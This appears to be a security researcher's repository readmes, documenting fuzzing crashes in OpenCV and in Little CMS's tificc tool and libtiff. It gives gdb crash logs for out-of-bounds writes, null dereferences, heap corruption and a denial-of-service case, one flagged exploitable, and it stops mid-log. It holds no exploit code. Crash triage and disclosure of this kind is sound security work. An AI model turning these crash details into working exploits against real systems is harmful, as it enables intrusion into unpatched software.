/data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 661 | ==16048== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 662 | ==16048== If you believe this happened as a result of a stack 663 | ==16048== overflow in your program's main thread (unlikely but 664 | ==16048== possible), you can try to increase the size of the 665 | ==16048== main thread stack using the --main-stacksize= flag. 666 | ==16048== The main thread stack size used in this run was 8388608. 667 | ==16048== 668 | ==16048== HEAP SUMMARY: 669 | ==16048== in use at exit: 2,462,831,174 bytes in 397 blocks 670 | ==16048== total heap usage: 458 allocs, 61 frees, 2,462,840,750 bytes allocated 671 | ==16048== 672 | ==16048== LEAK SUMMARY: 673 | ==16048== definitely lost: 0 bytes in 0 blocks 674 | ==16048== indirectly lost: 0 bytes in 0 blocks 675 | ==16048== possibly lost: 5,324 bytes in 105 blocks 676 | ==16048== still reachable: 2,462,825,850 bytes in 292 blocks 677 | ==16048== suppressed: 0 bytes in 0 blocks 678 | ==16048== Rerun with --leak-check=full to see details of leaked memory 679 | ==16048== 680 | ==16048== For counts of detected and suppressed errors, rerun with: -v 681 | ==16048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 682 | Segmentation fault 683 | 684 | 685 | ``` 686 | 687 | # 13. DOS, exhaust CPU for 10 hours. 688 | 689 | a new DOS testcase in opencv after a patch in 20170823, 690 | it could exhaust cpu for more than 10 hours. 
691 | 692 | 693 | 694 | ![](./pics/dos-10h.PNG) 695 | -------------------------------------------------------------------------------- /cms/readme.md: -------------------------------------------------------------------------------- 1 | POC of CMS 2 | ===================== 3 | 4 | 5 | 6 | 7 | ## 1-cms-out-bound-write-PrecalculateXFORM 8 | 9 | 10 | ``` 11 | 12 | gdb --args tificc $POC /tmp/out.tiff 13 | 14 | Program received signal SIGSEGV, Segmentation fault. 15 | [------------------------------------stack-------------------------------------] 16 | 0000| 0x7fffffffe838 --> 0x7ffff7b21c2c (: mov r11,QWORD PTR [rbx+0x70]) 17 | 0008| 0x7fffffffe840 --> 0x3c95700000000000 18 | 0016| 0x7fffffffe848 --> 0x102000000b10 19 | 0024| 0x7fffffffe850 --> 0x0 20 | 0032| 0x7fffffffe858 --> 0x62e610 --> 0x4000200010000 21 | 0040| 0x7fffffffe860 --> 0x614820 --> 0x0 22 | 0048| 0x7fffffffe868 --> 0x100000000 23 | 0056| 0x7fffffffe870 --> 0x0 24 | [------------------------------------------------------------------------------] 25 | Legend: code, data, rodata, value 26 | Stopped reason: SIGSEGV 27 | 0x00007ffff7000000 in ?? () 28 | #0 0x00007ffff7000000 in ?? () 29 | #1 0x00007ffff7b21c2c in PrecalculatedXFORM (p=0x616940, in=0x62e610, out=0x614820, PixelsPerLine=0x1020, LineCount=0x1, Stride=0x7fffffffe900) at ../../cms/src/cmsxform.c:410 30 | #2 0x00007ffff7b25285 in cmsDoTransform (Transform=Transform@entry=0x616940, InputBuffer=InputBuffer@entry=0x62e610, OutputBuffer=OutputBuffer@entry=0x614820, Size=Size@entry=0x1020) at ../. 31 | ./cms/src/cmsxform.c:189 32 | #3 0x0000000000405ac7 in TileBasedXform (nPlanes=0x1, out=0x6124d0, in=, hXForm=0x616940) at ../../../cms/utils/tificc/tificc.c:408 33 | #4 TransformImage (cDefInpProf=, out=, in=) at ../../../cms/utils/tificc/tificc.c:904 34 | #5 main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffeba8) at ../../../cms/utils/tificc/tificc.c:1167 35 | #6 0x00007ffff71fe830 in __libc_start_main (main=0x402360
, argc=0x3, argv=0x7fffffffeba8, init=, fini=, rtld_fini=, stack_end=0x7fffffffeb 36 | 98) at ../csu/libc-start.c:291 37 | #7 0x0000000000408e29 in _start () 38 | 39 | __main__:99: UserWarning: GDB v7.11 may not support required Python API 40 | Description: Segmentation fault on program counter 41 | Short description: SegFaultOnPc (3/22) 42 | Hash: a623b76741d0ee9936f43614a95f8a38.d3ce2561115efa40618f8e7190e9ac1e 43 | Exploitability Classification: EXPLOITABLE 44 | Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but 45 | it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be contro 46 | lled by an attacker. 47 | Other tags: AccessViolation (21/22) 48 | 49 | 50 | ``` 51 | 52 | 53 | 54 | ## 2.tiff-crash-TIFFWriteEncodeTile 55 | 56 | 这个crash在libtiff的TIFFWriteEncodeTile函数中,需要在最新版中分析。 57 | 58 | ``` 59 | Stopped reason: SIGABRT 60 | 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 61 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 
62 | gdb-peda$ bt 63 | #0 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 64 | #1 0x00007ffff734102a in __GI_abort () at abort.c:89 65 | #2 0x00007ffff73817ea in __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff749aed8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 66 | #3 0x00007ffff738c13e in malloc_printerr (ar_ptr=0x7ffff76ceb20 , ptr=0x60d430, str=0x7ffff7497d3f "malloc(): memory corruption", action=) at malloc.c:5006 67 | #4 _int_malloc (av=av@entry=0x7ffff76ceb20 , bytes=bytes@entry=0x2000) at malloc.c:3474 68 | #5 0x00007ffff738e184 in __GI___libc_malloc (bytes=0x2000) at malloc.c:2913 69 | #6 0x00007ffff7933af9 in TIFFWriteBufferSetup () from /usr/lib/x86_64-linux-gnu/libtiff.so.5 70 | #7 0x00007ffff79343b1 in TIFFWriteEncodedTile () from /usr/lib/x86_64-linux-gnu/libtiff.so.5 71 | #8 0x0000000000402db6 in TileBasedXform (hXForm=0x60e940, in=0x609860, out=0x60a4d0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:412 72 | #9 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4d0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 73 | #10 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 74 | #11 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 75 | #12 0x0000000000401fe9 in _start () 76 | 77 | 78 | ``` 79 | 80 | 81 | ## 3-cms-NULL-Pointer-cmsEvalToneCurve16 82 | 83 | 84 | ``` 85 | gdb --args tificc $POC /tmp/out.tiff 86 | 87 | Program received signal SIGSEGV, Segmentation fault. 88 | [----------------------------------registers-----------------------------------] 89 | RAX: 0x0 90 | RBX: 0x7fffffffde94 --> 0x0 91 | RCX: 0x8 92 | RDX: 0x0 93 | RSI: 0x0 94 | RDI: 0x60e100 --> 0x0 95 | RBP: 0x7fffffffdde0 --> 0x7fffffffde10 --> 0x7fffffffde60 --> 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 (--> ...) 96 | RSP: 0x7fffffffddc0 --> 0xffffdde0 97 | RIP: 0x7ffff7b78259 (: mov rax,QWORD PTR [rax+0x80]) 98 | R8 : 0x2ce 99 | R9 : 0x7fffffffe3a0 --> 0x0 100 | R10: 0x9d 101 | R11: 0x7ffff7b7820b (: push rbp) 102 | R12: 0x60e10b --> 0x60c6600000000000 103 | R13: 0x7fffffffe630 --> 0x3 104 | R14: 0x0 105 | R15: 0x0 106 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 107 | [-------------------------------------code-------------------------------------] 108 | 0x7ffff7b7824d : call 0x7ffff7b6fa60 <__assert_fail@plt> 109 | 0x7ffff7b78252 : mov rax,QWORD PTR [rbp-0x18] 110 | 0x7ffff7b78256 : mov rax,QWORD PTR [rax] 111 | => 0x7ffff7b78259 : mov rax,QWORD PTR [rax+0x80] 112 | 0x7ffff7b78260 : mov rdx,QWORD PTR [rbp-0x18] 113 | 0x7ffff7b78264 : mov rdx,QWORD PTR [rdx] 114 | 0x7ffff7b78267 : lea rsi,[rbp-0xa] 115 | 0x7ffff7b7826b : lea rcx,[rbp-0x1c] 116 | [------------------------------------stack-------------------------------------] 117 | 0000| 0x7fffffffddc0 --> 0xffffdde0 118 | 0008| 0x7fffffffddc8 --> 0x60e100 --> 0x0 119 | 0016| 0x7fffffffddd0 --> 0x7fffffffde94 --> 0x0 120 | 0024| 0x7fffffffddd8 --> 0x286060b593741800 121 | 0032| 0x7fffffffdde0 --> 0x7fffffffde10 --> 0x7fffffffde60 --> 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 (--> ...) 
122 | 0040| 0x7fffffffdde8 --> 0x7ffff7b781d2 (: mov WORD PTR [rbp-0x2],ax) 123 | 0048| 0x7fffffffddf0 --> 0xffffde10 124 | 0056| 0x7fffffffddf8 --> 0x60e100 --> 0x0 125 | [------------------------------------------------------------------------------] 126 | Legend: code, data, rodata, value 127 | Stopped reason: SIGSEGV 128 | 0x00007ffff7b78259 in cmsEvalToneCurve16 (Curve=0x60e100, v=0x0) at ../../cms/src/cmsgamma.c:1376 129 | 1376 Curve ->InterpParams ->Interpolation.Lerp16(&v, &out, Curve ->InterpParams); 130 | gdb-peda$ p Curve->InterpParams 131 | $1 = (cmsInterpParams *) 0x0 132 | 133 | 134 | ``` 135 | 136 | ## 4-cms-invalid-access-AllocateToneCurveStruct 137 | 138 | ``` 139 | 140 | gdb --args tificc $POC /tmp/out.tiff 141 | 142 | Program received signal SIGSEGV, Segmentation fault. 143 | [----------------------------------registers-----------------------------------] 144 | RAX: 0xfffffffc 145 | RBX: 0x7fffffffdea8 --> 0x7fff00000000 146 | RCX: 0xffffffffffffffff 147 | RDX: 0x7ffff7b74c00 (: rex.RB loopne 0x7ffff7b74c4b ) 148 | RSI: 0x60e6c0 --> 0x4003333333333333 149 | RDI: 0xfffffffc 150 | RBP: 0x7fffffffddf0 --> 0x7fffffffde20 --> 0x7fffffffde70 --> 0x7fffffffe2c0 --> 0x7fffffffe370 --> 0x7fffffffe3d0 (--> ...) 
151 | RSP: 0x7fffffffdda8 --> 0x7ffff7b75ecb (: movq rax,xmm0) 152 | RIP: 0x7ffff7b74c4b (: (bad)) 153 | R8 : 0x2ce 154 | R9 : 0x7fffffffe3b0 --> 0x0 155 | R10: 0x15b 156 | R11: 0x7ffff7b97389 (: push rbp) 157 | R12: 0x60c141 --> 0xb800007ffff7b74c 158 | R13: 0x7fffffffe640 --> 0x3 159 | R14: 0x0 160 | R15: 0x0 161 | EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) 162 | [-------------------------------------code-------------------------------------] 163 | => 0x7ffff7b74c4b : (bad) 164 | 0x7ffff7b74c4c : je 0x7ffff7b74c65 165 | 0x7ffff7b74c4e : mov rax,QWORD PTR [rbp-0x20] 166 | 0x7ffff7b74c52 : mov rdx,QWORD PTR [rax+0x20] 167 | [------------------------------------stack-------------------------------------] 168 | 0000| 0x7fffffffdda8 --> 0x7ffff7b75ecb (: movq rax,xmm0) 169 | 0008| 0x7fffffffddb0 --> 0x1 170 | 0016| 0x7fffffffddb8 --> 0x0 171 | 0024| 0x7fffffffddc0 --> 0x0 172 | 0032| 0x7fffffffddc8 --> 0x609df0 --> 0x60c180 --> 0x0 173 | 0040| 0x7fffffffddd0 --> 0x4237ffff80018000 174 | 0048| 0x7fffffffddd8 --> 0xc9cc2500 175 | 0056| 0x7fffffffdde0 --> 0x0 176 | [------------------------------------------------------------------------------] 177 | Legend: code, data, rodata, value 178 | Stopped reason: SIGSEGV 179 | 0x00007ffff7b74c4b in AllocateToneCurveStruct (ContextID=0x0, nEntries=0x0, nSegments=0x1, Segments=0x7ffff7b75ecb , Values=0x7fffffffddf0) at ../../cms/src/cmsgamma.c:304 180 | 304 if (p -> Evals) _cmsFree(ContextID, p -> Evals); 181 | gdb-peda$ p p 182 | $1 = (cmsToneCurve *) 0x4237ffff80018000 183 | gdb-peda$ p *p 184 | Cannot access memory at address 0x4237ffff80018000 185 | ``` 186 | 187 | 188 | ## 5-cms-invalid-access-cmsReadHeader 189 | 190 | 191 | ``` 192 | gdb --args tificc $POC /tmp/out.tiff 193 | Program received signal SIGSEGV, Segmentation fault. 
194 | 0x00007ffff7b80000 in _cmsReadHeader (Icc=0x1b7d90508ff21000) at ../../cms/src/cmsio0.c:699 195 | 699 cmsSignalError(Icc ->ContextID, cmsERROR_BAD_SIGNATURE, "not an ICC profile, invalid signature"); 196 | [----------------------------------registers-----------------------------------] 197 | RAX: 0x7ffff7b80000 (<_cmsReadHeader+150>: add BYTE PTR [rax],al) 198 | RBX: 0x7ffff4d764dc --> 0x0 199 | RCX: 0x1fe020 200 | RDX: 0x7ffff4d764dc --> 0x0 201 | RSI: 0x7fffffffe2d0 --> 0x0 202 | RDI: 0x60c410 --> 0x0 203 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 204 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 205 | RIP: 0x7ffff7b80000 (<_cmsReadHeader+150>: add BYTE PTR [rax],al) 206 | R8 : 0x2ce 207 | R9 : 0x7fffffffe370 --> 0x0 208 | R10: 0x15b 209 | R11: 0x7ffff7b97389 (: push rbp) 210 | R12: 0x60c422 --> 0x8ee00007ffff7b8 211 | R13: 0x7fffffffe600 --> 0x3 212 | R14: 0x0 213 | R15: 0x0 214 | EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) 215 | [-------------------------------------code-------------------------------------] 216 | => 0x7ffff7b80000 <_cmsReadHeader+150>: add BYTE PTR [rax],al 217 | 0x7ffff7b80002 <_cmsReadHeader+152>: add al,ch 218 | 0x7ffff7b80004 <_cmsReadHeader+154>: push 0xffffffffb8fffefb 219 | 0x7ffff7b80009 <_cmsReadHeader+159>: add BYTE PTR [rax],al 220 | [------------------------------------stack-------------------------------------] 221 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 222 | 0008| 0x7fffffffe290 --> 0x0 223 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 224 | 0024| 0x7fffffffe2a0 --> 0x1fe02000000001 225 | 0032| 0x7fffffffe2a8 --> 0x60aee0 --> 0x0 226 | 0040| 0x7fffffffe2b0 --> 0x7ffff4d71010 --> 0x0 227 | 0048| 0x7fffffffe2b8 --> 0x60c410 --> 0x0 228 | 0056| 0x7fffffffe2c0 --> 0x71600000000 229 | 
[------------------------------------------------------------------------------] 230 | Legend: code, data, rodata, value 231 | Stopped reason: SIGSEGV 232 | gdb-peda$ bt 233 | #0 0x00007ffff7b80000 in _cmsReadHeader (Icc=0x1b7d90508ff21000) at ../../cms/src/cmsio0.c:699 234 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c410, InputBuffer=0x7ffff4d71010, OutputBuffer=0x60aee0, Size=0x1fe020) at ../../cms/src/cmsxform.c:189 235 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60c410, in=0x609860, out=0x60a5c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 236 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 237 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 238 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 239 | #6 0x0000000000401fe9 in _start () 240 | gdb-peda$ p Icc 241 | $3635 = (_cmsICCPROFILE *) 0x1b7d90508ff21000 242 | gdb-peda$ p Icc->ContextID 243 | Cannot access memory at address 0x1b7d90508ff21008 244 | 245 | 246 | ``` 247 | 248 | 249 | ## 6-cms-invalid-access-Pack3Bytes 250 | 251 | 252 | ``` 253 | 254 | gdb --args tificc $POC /tmp/out.tiff 255 | Program received signal SIGSEGV, Segmentation fault. 256 | [----------------------------------registers-----------------------------------] 257 | RAX: 0x643001 258 | RBX: 0x7ffff5f94fd1 --> 0x0 259 | RCX: 0x0 260 | RDX: 0x643000 ('') 261 | RSI: 0x0 262 | RDI: 0x60c8f0 --> 0x4001900040091 263 | RBP: 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 264 | RSP: 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 265 | RIP: 0x7ffff7b9095a (: mov BYTE PTR [rdx],cl) 266 | R8 : 0x1 267 | R9 : 0x7fffffffe370 --> 0x0 268 | R10: 0x15b 269 | R11: 0x7ffff7b97389 (: push rbp) 270 | R12: Cannot access memory address 271 | R13: 0x7fffffffe600 --> 0x3 272 | R14: 0x0 273 | R15: 0x0 274 | EFLAGS: 0x10247 (CARRY PARITY adjust ZERO sign trap INTERRUPT direction overflow) 275 | [-------------------------------------code-------------------------------------] 276 | 0x7ffff7b9094b : imul ecx,ecx,0xff01 277 | 0x7ffff7b90951 : add ecx,0x800000 278 | 0x7ffff7b90957 : shr ecx,0x18 279 | => 0x7ffff7b9095a : mov BYTE PTR [rdx],cl 280 | 0x7ffff7b9095c : pop rbp 281 | 0x7ffff7b9095d : ret 282 | 0x7ffff7b9095e : push rbp 283 | 0x7ffff7b9095f : mov rbp,rsp 284 | [------------------------------------stack-------------------------------------] 285 | 0000| 0x7fffffffe280 --> 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 (--> ...) 
286 | 0008| 0x7fffffffe288 --> 0x7ffff7b97b7f (: mov r12,rax) 287 | 0016| 0x7fffffffe290 --> 0x0 288 | 0024| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 289 | 0032| 0x7fffffffe2a0 --> 0x1fe02000000001 290 | 0040| 0x7fffffffe2a8 --> 0x60d040 --> 0x0 291 | 0048| 0x7fffffffe2b0 --> 0x7ffff5f5f010 --> 0x0 292 | 0056| 0x7fffffffe2b8 --> 0x60c8f0 --> 0x4001900040091 293 | [------------------------------------------------------------------------------] 294 | Legend: code, data, rodata, value 295 | Stopped reason: SIGSEGV 296 | 0x00007ffff7b9095a in Pack3Bytes (info=0x60c8f0, wOut=0x0, output=0x643001 , Stride=0x0) at ../../cms/src/cmspack.c:1834 297 | 1834 *output++ = FROM_16_TO_8(wOut[2]); 298 | gdb-peda$ p wOut[2] 299 | Cannot access memory at address 0x4 300 | 301 | 302 | 303 | ``` 304 | 305 | 306 | ## 7-cms-null-pointer-cmsPipelineCheckAndRetreiveStages 307 | 308 | ``` 309 | gdb --args tificc $POC /tmp/out.tiff 310 | Program received signal SIGILL, Illegal instruction. 311 | [----------------------------------registers-----------------------------------] 312 | RAX: 0x7ffff7b85252 (: sbb al,0xff) 313 | RBX: 0x620c44 --> 0x52d552c552b552a5 314 | RCX: 0x3030 ('00') 315 | RDX: 0x620c44 --> 0x52d552c552b552a5 316 | RSI: 0x7fffffffe2d0 --> 0x529552855275 317 | RDI: 0x60c430 ("QQQQQ", 'R' , "\270\367\377\177") 318 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 319 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 320 | RIP: 0x7ffff7b85254 (: (bad)) 321 | R8 : 0x1 322 | R9 : 0x7fffffffe370 --> 0x0 323 | R10: 0x15b 324 | R11: 0x7ffff7b97389 (: push rbp) 325 | R12: 0x60c442 --> 0x8ee00007ffff7b8 326 | R13: 0x7fffffffe600 --> 0x3 327 | R14: 0x0 328 | R15: 0x0 329 | EFLAGS: 0x10213 (CARRY parity ADJUST zero sign trap INTERRUPT direction overflow) 330 | [-------------------------------------code-------------------------------------] 331 | => 0x7ffff7b85254 : (bad) 332 | 
0x7ffff7b85255 : push QWORD PTR [rdx+rcx*1-0x48] 333 | 0x7ffff7b85259 : add BYTE PTR [rax],al 334 | 0x7ffff7b8525b : add BYTE PTR [rax],al 335 | [------------------------------------stack-------------------------------------] 336 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 337 | 0008| 0x7fffffffe290 --> 0x0 338 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 339 | 0024| 0x7fffffffe2a0 --> 0x303000000001 340 | 0032| 0x7fffffffe2a8 --> 0x60af00 --> 0x40007ff6eb 341 | 0040| 0x7fffffffe2b0 --> 0x61e1c0 --> 0x7ffff76ceb78 --> 0x6302e0 --> 0x0 342 | 0048| 0x7fffffffe2b8 --> 0x60c430 ("QQQQQ", 'R' , "\270\367\377\177") 343 | 0056| 0x7fffffffe2c0 --> 0x71600000000 344 | [------------------------------------------------------------------------------] 345 | Legend: code, data, rodata, value 346 | Stopped reason: SIGILL 347 | 0x00007ffff7b85254 in cmsPipelineCheckAndRetreiveStages (Lut=0x0, n=0x0) at ../../cms/src/cmslut.c:129 348 | 129 if (mpe ->Type != Type) 349 | gdb-peda$ p mpe 350 | $1 = (cmsStage *) 0x0 351 | gdb-peda$ bt 352 | #0 0x00007ffff7b85254 in cmsPipelineCheckAndRetreiveStages (Lut=0x0, n=0x0) at ../../cms/src/cmslut.c:129 353 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c430, InputBuffer=0x61e1c0, OutputBuffer=0x60af00, Size=0x3030) at ../../cms/src/cmsxform.c:189 354 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60c430, in=0x609860, out=0x60a5e0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 355 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5e0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 356 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 357 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 358 | #6 0x0000000000401fe9 in _start () 359 | 360 | ``` 361 | 362 | ## 8-cms-crash-UnrollDoubleTo16 363 | 364 | 365 | ``` 366 | gdb --args tificc $POC /tmp/out.tiff 367 | Program received signal SIGILL, Illegal instruction. 368 | [----------------------------------registers-----------------------------------] 369 | RAX: 0x7ffff7b8f000 (: rex.RB fsubr st,st(0)) 370 | RBX: 0x7ffff4d79518 --> 0x0 371 | RCX: 0x1fe020 372 | RDX: 0x7ffff4d79518 --> 0x0 373 | RSI: 0x7fffffffe2d0 --> 0x0 374 | RDI: 0x60ea40 --> 0x0 375 | RBP: 0x7fffffffe330 --> 0x7fffffffe390 --> 0x7fffffffe400 --> 0x7fffffffe4f0 --> 0x7fffffffe520 --> 0x405ad0 (<__libc_csu_init>: push r15) 376 | RSP: 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 377 | RIP: 0x7ffff7b8f003 (: (bad)) 378 | R8 : 0x2ce 379 | R9 : 0x7fffffffe370 --> 0x0 380 | R10: 0x15b 381 | R11: 0x7ffff7b97389 (: push rbp) 382 | R12: 0x60ea51 --> 0xee00007ffff7b8f0 383 | R13: 0x7fffffffe600 --> 0x3 384 | R14: 0x0 385 | R15: 0x0 386 | EFLAGS: 0x10283 (CARRY parity adjust zero SIGN trap INTERRUPT direction overflow) 387 | [-------------------------------------code-------------------------------------] 388 | => 0x7ffff7b8f003 : (bad) 389 | 0x7ffff7b8f004 : jmp 0x7ffff7b8f005 390 | 0x7ffff7b8f006 : jmp QWORD PTR [rsi-0x77] 391 | 0x7ffff7b8f009 : rex.RB movs BYTE PTR es:[rdi],BYTE PTR ds:[rsi] 392 | [------------------------------------stack-------------------------------------] 393 | 0000| 0x7fffffffe288 --> 0x7ffff7b97b36 (: mov rbx,rax) 394 | 0008| 0x7fffffffe290 --> 0x0 395 | 0016| 0x7fffffffe298 --> 0x7fffffffe370 --> 0x0 396 | 0024| 0x7fffffffe2a0 --> 0x1fe02000000001 397 | 0032| 0x7fffffffe2a8 --> 0x60c900 --> 0x0 398 | 0040| 0x7fffffffe2b0 --> 0x7ffff4d71010 --> 0x0 399 | 0048| 0x7fffffffe2b8 --> 0x60ea40 --> 0x0 400 | 0056| 0x7fffffffe2c0 --> 0xb1b00000000 401 | 
[------------------------------------------------------------------------------] 402 | Legend: code, data, rodata, value 403 | Stopped reason: SIGILL 404 | 0x00007ffff7b8f003 in UnrollDoubleTo16 (info=0x7ffff4d79518, wIn=0x60ea51, accum=0x7fffffffe600 "\003", Stride=0x0) at ../../cms/src/cmspack.c:989 405 | 989 vi = _cmsQuickSaturateWord(v * maximum); 406 | gdb-peda$ bt 407 | #0 0x00007ffff7b8f003 in UnrollDoubleTo16 (info=0x7ffff4d79518, wIn=0x60ea51, accum=0x7fffffffe600 "\003", Stride=0x0) at ../../cms/src/cmspack.c:989 408 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60ea40, InputBuffer=0x7ffff4d71010, OutputBuffer=0x60c900, Size=0x1fe020) at ../../cms/src/cmsxform.c:189 409 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60ea40, in=0x609860, out=0x60a5b0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 410 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a5b0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 411 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 412 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 413 | #6 0x0000000000401fe9 in _start () 414 | 415 | 416 | ``` 417 | 418 | 419 | ## 9-cms-heap-overflow 420 | 421 | ``` 422 | 423 | [----------------------------------registers-----------------------------------] 424 | RAX: 0x0 425 | RBX: 0x65 ('e') 426 | RCX: 0xffffffffffffffff 427 | RDX: 0x6 428 | RSI: 0x1390 429 | RDI: 0x1390 430 | RBP: 0x7fffffffdad0 --> 0x50 ('P') 431 | RSP: 0x7fffffffd738 --> 0x7ffff734102a (<__GI_abort+362>: mov rdx,QWORD PTR fs:0x10) 432 | RIP: 0x7ffff733f428 (<__GI_raise+56>: cmp rax,0xfffffffffffff000) 433 | R8 : 0x6 434 | R9 : 0x0 435 | R10: 0x8 436 | R11: 0x206 437 | R12: 0x65 ('e') 438 | R13: 0x7fffffffd8e8 --> 0x7fffffffde80 --> 0x7fffffffdf14 --> 0xf4e7901000000000 439 | R14: 0x7fffffffd8e8 --> 0x7fffffffde80 --> 0x7fffffffdf14 --> 0xf4e7901000000000 440 | R15: 0x2 441 | EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 442 | [-------------------------------------code-------------------------------------] 443 | 0x7ffff733f41e <__GI_raise+46>: mov eax,0xea 444 | 0x7ffff733f423 <__GI_raise+51>: movsxd rdi,ecx 445 | 0x7ffff733f426 <__GI_raise+54>: syscall 446 | => 0x7ffff733f428 <__GI_raise+56>: cmp rax,0xfffffffffffff000 447 | 0x7ffff733f42e <__GI_raise+62>: ja 0x7ffff733f450 <__GI_raise+96> 448 | 0x7ffff733f430 <__GI_raise+64>: repz ret 449 | 0x7ffff733f432 <__GI_raise+66>: nop WORD PTR [rax+rax*1+0x0] 450 | 0x7ffff733f438 <__GI_raise+72>: test ecx,ecx 451 | [------------------------------------stack-------------------------------------] 452 | 0000| 0x7fffffffd738 --> 0x7ffff734102a (<__GI_abort+362>: mov rdx,QWORD PTR fs:0x10) 453 | 0008| 0x7fffffffd740 --> 0x20 (' ') 454 | 0016| 0x7fffffffd748 --> 0x0 455 | 0024| 0x7fffffffd750 --> 0x0 456 | 0032| 0x7fffffffd758 --> 0x0 457 | 0040| 0x7fffffffd760 --> 0x0 458 | 0048| 0x7fffffffd768 --> 0x0 459 | 0056| 0x7fffffffd770 --> 0x0 460 | 
[------------------------------------------------------------------------------] 461 | Legend: code, data, rodata, value 462 | Stopped reason: SIGABRT 463 | 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 464 | 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 465 | gdb-peda$ bt 466 | #0 0x00007ffff733f428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54 467 | #1 0x00007ffff734102a in __GI_abort () at abort.c:89 468 | #2 0x00007ffff73817ea in __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff749aed8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 469 | #3 0x00007ffff738c13e in malloc_printerr (ar_ptr=0x7ffff76ceb20 , ptr=0x610740, str=0x7ffff7497d3f "malloc(): memory corruption", action=) at 